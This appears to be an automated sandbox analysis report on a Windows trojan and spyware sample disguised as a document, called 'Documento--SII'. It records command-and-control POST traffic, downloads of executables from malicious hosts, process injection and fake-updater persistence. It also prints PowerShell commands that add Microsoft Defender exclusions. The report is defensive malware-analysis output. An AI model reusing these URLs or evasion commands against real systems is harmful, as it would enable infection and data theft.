Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=9557666 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 66 71 62 67 72 3d 41 30 44 36 39 39 38 35 42 44 30 44 39 45 36 44 32 32 43 45 32 43 35 42 46 39 34 42 46 46 41 31 45 36 36 37 46 33 37 46 34 44 37 37 34 41 38 46 38 36 44 35 43 46 26 64 6d 76 79 68 71 7a 63 6c 3d 32 30 30 30 32 34 37 35 26 68 75 68 6f 62 6f 62 3d 62 62 65 37 65 39 66 65 35 38 39 31 30 35 33 30 32 62 34 63 31 39 38 33 33 37 64 37 65 30 64 31 37 63 34 38 39 31 62 34 37 64 61 30 32 38 37 61 30 35 35 38 30 39 35 65 30 38 64 62 65 36 32 36 65 66 31 35 33 37 39 62 39 35 36 30 62 38 32 37 34 30 65 38 39 33 66 31 66 35 66 63 61 39 65 30 64 34 65 64 30 63 62 33 33 31 61 61 62 61 38 37 66 31 63 65 66 35 34 34 64 66 64 32 61 31 62 35 39 61 36 39 63 62 66 61 35 38 39 32 31 33 61 31 31 63 36 31 39 38 36 65 39 34 31 34 32 31 35 33 63 63 39 39 66 63 61 35 64 62 34 34 61 66 34 38 61 65 66 37 65 30 65 30 36 65 34 34 34 37 61 33 33 31 61 37 62 32 30 33 61 38 62 32 33 61 66 35 37 61 35 62 38 38 34 31 62 32 64 63 62 38 37 31 64 37 37 64 65 61 33 61 65 39 34 34 65 66 66 65 39 64 33 32 39 31 32 32 35 63 32 34 39 32 38 35 61 61 33 31 66 62 35 39 66 39 63 39 36 33 36 37 36 37 39 36 33 37 64 65 34 62 39 66 66 30 63 62 34 37 35 66 33 62 35 64 37 36 65 37 61 35 66 31 34 35 64 36 31 30 64 61 61 63 61 35 38 63 37 32 31 36 32 32 33 61 34 64 35 35 64 36 61 36 36 32 38 38 63 34 35 31 61 61 39 37 39 62 37 65 36 61 36 32 36 35 34 39 64 64 31 65 63 62 37 32 34 65 36 62 66 33 66 31 63 31 32 61 38 62 38 34 64 32 66 32 39 62 31 32 31 35 35 61 30 62 38 33 31 32 37 32 31 63 61 61 39 35 37 36 30 66 36 61 32 33 32 61 32 32 30 32 33 37 36 62 63 37 63 65 33 64 66 63 61 63 32 33 64 64 62 35 35 31 62 33 66 33 34 31 64 30 30 66 33 30 65 66 66 65 39 62 36 36 61 35 61 66 31 33 38 35 37 64 65 33 62 37 39 61 37 37 34 30 32 63 34 38 66 35 65 63 35 61 31 61 31 30 31 63 37 32 39 63 61 63 39 30 61 33 34 36 38 30 34 39 63 61 64 39 35 65 38 35 38 37 35 32 33 32 65 64 34 35 34 35 33 32 65 32 31 30 36 33 65 31 66 64 34 32 33 63 66 33 36 32 39 33 35 39 64 30 65 38 65 65 37 32 66 35 31 32 38 62 65 37 34 61 63 33 62 39 35 35 Data Ascii: fqbgr=A0D69985BD0D9E6D22CE2C5BF94BFFA1E667F37F4D774A8F86D5CF&dmvyhqzcl=20002475&huhobob=bbe7e9fe589105302b4c198337d7e0d17c4891b47da0287a0558095e08dbe626ef15379b9560b82740e893f1f5fca9e0d4ed0cb331aaba87f1cef544dfd2a1b59a69cbfa589213a11c61986e94142153cc99fca5db44af48aef7e0e06e4447a331a7b203a8b23af57a5b8841b2dcb871d77dea3ae944effe9d3291225c249285aa31fb59f9c96367679637de4b9ff0cb475f3b5d76e7a5f145d610daaca58c7216223a4d55d6a66288c451aa979b7e6a626549dd1ecb724e6bf3f1c12a8b84d2f29b12155a0b8312721caa95760f6a232a2202376bc7ce3dfcac23ddb551b3f341d00f30effe9b66a5af13857de3b79a77402c48f5ec5a1a101c729cac90a3468049cad95e85875232ed454532e21063e1fd423cf3629359d0e8ee72f5128be74ac3b955
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=2442663 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 659Cache-Control: no-cacheData Raw: 6d 79 6b 77 69 75 67 73 3d 37 34 38 34 37 38 36 36 38 64 34 35 66 66 39 37 38 38 38 38 66 61 61 30 38 34 34 62 63 34 39 65 34 34 62 38 63 38 30 35 64 39 32 63 26 6b 75 65 6f 79 69 3d 31 35 32 36 34 30 36 32 26 6f 63 71 65 3d 33 64 36 34 36 38 34 62 35 66 65 34 66 66 65 65 31 64 61 61 62 36 63 33 63 36 66 39 37 35 65 37 32 61 36 32 31 39 36 34 39 63 34 35 66 33 61 39 39 34 32 63 37 39 34 64 32 32 63 63 35 36 65 33 36 66 61 34 33 61 65 33 32 63 37 36 39 61 32 31 37 39 63 35 33 37 61 31 39 63 63 36 38 62 34 33 64 31 64 38 30 64 63 34 38 33 33 61 65 33 62 32 31 39 39 30 34 39 66 39 31 62 38 66 38 35 65 35 62 35 39 30 34 31 31 63 39 31 62 63 61 62 39 64 38 34 30 63 37 31 34 36 37 66 35 65 66 31 30 39 38 33 39 30 31 33 35 61 63 62 36 31 66 37 31 66 61 36 39 32 62 62 36 37 63 38 62 62 66 33 63 63 37 32 63 37 65 38 37 66 61 64 39 64 36 35 65 34 35 39 36 66 62 63 37 62 38 64 38 37 32 63 66 38 30 63 66 66 63 38 31 65 36 32 65 65 35 35 35 33 66 37 37 61 38 61 62 32 32 33 31 63 35 39 64 37 35 38 39 35 62 31 36 61 31 65 31 64 34 34 38 31 37 36 31 65 63 64 34 35 34 39 37 31 37 61 64 34 62 39 61 36 36 65 31 65 31 37 64 61 30 62 30 65 65 30 37 34 30 65 33 61 38 38 65 30 33 34 32 31 30 61 63 62 30 64 31 33 64 30 36 35 62 62 61 39 35 37 65 37 39 66 37 34 61 63 62 35 38 37 63 63 37 33 32 32 66 65 36 62 62 30 36 33 31 34 38 32 61 32 39 61 34 34 36 61 34 36 65 31 33 64 32 61 66 30 61 38 32 64 31 32 39 63 31 66 35 64 31 34 32 62 61 61 64 38 38 64 31 30 34 65 66 66 66 34 39 35 65 39 39 65 62 38 33 65 39 33 61 35 37 31 31 61 34 38 65 38 65 62 38 65 66 36 34 35 66 65 37 34 63 37 36 30 36 65 31 61 34 65 34 36 35 35 37 36 63 31 37 32 36 30 35 63 31 31 35 62 38 34 62 39 66 65 39 34 63 64 35 32 65 33 64 33 31 63 36 34 36 36 64 33 64 63 39 30 38 30 36 33 38 66 66 62 30 33 66 30 33 66 66 63 64 66 33 65 37 35 62 35 65 62 30 62 30 30 30 32 37 64 63 30 39 32 34 39 33 65 63 62 66 65 39 61 65 34 62 62 39 37 37 38 64 35 32 35 30 61 61 66 63 36 30 37 39 35 66 31 31 30 31 30 32 39 Data Ascii: mykwiugs=748478668d45ff978888faa0844bc49e44b8c805d92c&kueoyi=15264062&ocqe=3d64684b5fe4ffee1daab6c3c6f975e72a6219649c45f3a9942c794d22cc56e36fa43ae32c769a2179c537a19cc68b43d1d80dc4833ae3b2199049f91b8f85e5b590411c91bcab9d840c71467f5ef1098390135acb61f71fa692bb67c8bbf3cc72c7e87fad9d65e4596fbc7b8d872cf80cffc81e62ee5553f77a8ab2231c59d75895b16a1e1d4481761ecd4549717ad4b9a66e1e17da0b0ee0740e3a88e034210acb0d13d065bba957e79f74acb587cc7322fe6bb0631482a29a446a46e13d2af0a82d129c1f5d142baad88d104efff495e99eb83e93a5711a48e8eb8ef645fe74c7606e1a4e465576c172605c115b84b9fe94cd52e3d31c6466d3dc9080638ffb03f03ffcdf3e75b5eb0b00027dc092493ecbfe9ae4bb9778d5250aafc60795f1101029
Source: global traffic	HTTP traffic detected: POST /forum/logout.php?id=7086675 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 633Cache-Control: no-cacheData Raw: 69 77 65 73 67 6f 63 71 3d 38 35 32 38 31 39 33 34 26 6b 61 6b 61 3d 37 33 65 62 32 63 64 65 62 62 63 63 33 36 62 62 30 37 26 6d 65 71 69 61 6d 3d 33 33 31 65 33 65 30 33 37 39 32 35 35 34 31 31 65 31 35 66 66 37 32 30 36 63 66 30 31 37 32 65 39 36 33 39 36 32 37 30 32 35 35 38 36 39 39 34 35 38 33 36 35 31 61 31 30 36 64 31 66 37 61 65 63 38 63 32 61 37 63 34 63 30 38 38 34 35 61 35 37 38 38 33 65 34 31 30 30 32 66 65 61 31 34 35 31 62 36 35 31 62 36 35 31 31 63 35 33 65 66 34 63 61 61 62 33 65 35 33 35 62 34 32 66 31 38 63 37 31 33 65 64 63 36 63 66 62 63 37 64 66 34 65 65 34 64 34 64 34 30 31 64 37 30 35 30 32 31 62 30 61 30 66 31 36 34 66 32 32 62 63 37 35 62 31 37 34 36 64 30 35 35 66 61 63 30 61 38 61 65 61 38 39 63 64 36 36 63 64 36 66 33 32 63 37 38 31 65 65 30 61 34 37 64 36 33 31 65 65 36 35 65 33 64 30 64 39 33 64 31 38 33 30 64 32 61 61 35 34 34 63 61 31 62 64 38 64 64 38 65 63 31 35 34 62 66 36 33 31 63 34 33 32 61 35 34 34 33 30 39 31 35 31 38 35 39 35 64 62 30 30 38 61 38 33 61 64 36 63 63 37 61 61 32 38 31 34 65 64 63 62 32 37 39 36 30 62 61 33 31 36 63 37 63 31 35 36 34 36 39 38 63 63 64 66 63 32 38 37 35 31 35 38 65 64 30 36 66 61 37 39 61 63 37 35 30 66 38 38 32 38 66 32 33 31 66 33 66 35 31 33 64 37 64 33 38 34 35 39 36 35 34 32 65 37 64 65 33 65 61 62 66 61 62 65 66 63 30 38 33 61 35 63 61 39 66 30 35 36 30 33 35 36 63 61 33 61 61 32 32 39 66 30 33 65 31 30 37 32 34 37 34 61 37 61 33 64 61 39 39 37 64 31 63 66 66 62 64 31 35 34 62 39 63 31 38 39 30 35 64 31 37 63 62 36 30 65 64 35 35 39 33 30 34 64 34 38 38 30 32 37 35 63 34 36 31 33 36 37 38 64 34 39 34 61 61 61 38 32 37 65 62 31 63 35 66 31 33 34 62 36 38 32 38 35 61 61 61 63 36 35 31 37 38 64 39 36 62 63 64 35 39 36 61 38 32 34 31 62 38 32 62 36 36 36 36 33 61 35 33 39 30 66 31 37 32 65 32 62 34 32 38 64 30 61 65 39 35 36 35 38 32 30 63 33 64 37 34 64 32 38 63 37 30 38 63 36 63 39 34 66 61 31 Data Ascii: iwesgocq=85281934&kaka=73eb2cdebbcc36bb07&meqiam=331e3e0379255411e15ff7206cf0172e9639627025586994583651a106d1f7aec8c2a7c4c08845a57883e41002fea1451b651b6511c53ef4caab3e535b42f18c713edc6cfbc7df4ee4d4d401d705021b0a0f164f22bc75b1746d055fac0a8aea89cd66cd6f32c781ee0a47d631ee65e3d0d93d1830d2aa544ca1bd8dd8ec154bf631c432a5443091518595db008a83ad6cc7aa2814edcb27960ba316c7c1564698ccdfc2875158ed06fa79ac750f8828f231f3f513d7d384596542e7de3eabfabefc083a5ca9f0560356ca3aa229f03e1072474a7a3da997d1cffbd154b9c18905d17cb60ed559304d4880275c4613678d494aaa827eb1c5f134b68285aaac65178d96bcd596a8241b82b66663a5390f172e2b428d0ae9565820c3d74d28c708c6c94fa1

Source: global traffic	HTTP traffic detected: GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zakriasons.coCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /old/GetDataAVK.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: estrelladamm.icuCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: rusianlover.icu

Source: unknown

HTTP traffic detected: POST /forum/logout.php?page=7 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 1081Cache-Control: no-cache

Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000025.00000002.358331639.00000248FF464000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000025.00000002.358882072.00000248FF834000.00000004.00000001.sdmp	String found in binary or memory: http://crl.mi
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-G
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://estrelladamm.icu/get.php__vbaVarSetVar
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://estrelladamm.icu/old/GetDataAVK.exe
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://estrelladamm.icu/old/GetDataAVK.exe2
Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp	String found in binary or memory: http://estrelladamm.icu/old/get.php
Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://rusianlover.icu/forum/logout.php
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://rusianlover.icu/forum/logout.php?id=2442663
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://rusianlover.icu/forum/logout.php?id=2442663t
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://rusianlover.icu/forum/logout.php?id=7086675
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: http://rusianlover.icu/forum/logout.php?pid=925
Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp	String found in binary or memory: http://www.apple.com/
Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: https://l0ioz.icu/pub/bin.exe
Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp	String found in binary or memory: https://www.mql5.com/ru/articles/download/69/system_data_sqlite.zip1

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown

HTTPS traffic detected: 104.21.55.228:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary:

Contains functionality to create processes via WMI

Show sources

Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp

Binary or memory string: EP91%s.manifest%s.configCpuFlushInstructionCache_wcslwr_wcsnicmpwcsstrwcsncpymemsetmemcpyNtQueryInformationThreadNtQueryInformationProcessNtCloseObject ErrorNULL PortUsername required, but NULLTime limit is too shortAlloc Errorhiheh1Windows\CurrentVersion\RunWindows NT\CurrentVersion\Image File Execution Options\%sSOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\PackagesKB%uInstallNamentkrnl/c start "" "%s" /%s "%s" . &CLS . &echo Fixing issues ...&ECHO Issues fixed! . &exit%pRtlQueryElevationFlagsEnableLUA/c start "" "%s" /%s&EXITwbem\WMIC.exeprocess call create "%s %s" SSDPSRVTCPWindows 3.1 Update Service

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Documento--SII--33875.exe

Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe

Code function: 11_2_0043D9E7 GetProcAddress,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,GetProcessHeap,RtlAllocateHeap,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,GetCommandLineA,CreateProcessA,GetProcAddress,GetProcAddress,GetModuleFileNameA,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,_hread,ResumeThread,GetCurrentProcess,VirtualAllocEx,GetProcessHeap,HeapAlloc,GetProcAddress,

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 1_2_004661F0
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 1_2_00467340
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: 11_2_004661F0
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: 11_2_00467340
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: 11_2_0044F314

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe 02DCE269070BFEC91E4F01A67D774167F8208F17211E8027D8A7FE3DC62A356B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe EB7CEA525ECEF555356C13B6948C21DDAD4B8A622FF4C027F285C0C096570253

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Process token adjusted: Load Driver

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: String function: 004294FB appears 45 times
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: String function: 0042919F appears 42 times
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: String function: 004294FB appears 45 times
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: String function: 0042919F appears 45 times

Source: iom7q73oi.exe.3.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Documento--SII--33875.exe, 00000001.00000000.227179544.00000000004A0000.00000002.00020000.sdmp

Binary or memory string: OriginalFilenameMs5io.exeDVarFileInfo$ vs Documento--SII--33875.exe

Source: Documento--SII--33875.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: iom7q73oi.exe, 00000022.00000002.315466729.0000000000409000.00000004.00020000.sdmp	Binary or memory string: f0 @*\AC:\Users\the\Downloads\SP\[lab]Down\Vb-codes\vb6\downLow3\DownLow3.vbp
Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp	Binary or memory string: @*\AC:\Users\the\Downloads\SP\[lab]Down\Vb-codes\vb6\downLow3\DownLow3.vbp

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@26/13@35/4

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process created: C:\Windows\SysWOW64\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Documento--SII--33875.exe

Virustotal: Detection: 49%

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

File read: C:\Users\user\Desktop\Documento--SII--33875.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe /suac
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
Source: unknown	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe /suac
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: unknown unknown
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Documento--SII--33875.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb} source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
Source:	Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\skunk\Desktop\SPCL\PPP\proyecto polinesia francesa\extractor\new\GetDataAVK\2\GetDataAVK\obj\Debug\GetDataAVK.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Unpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
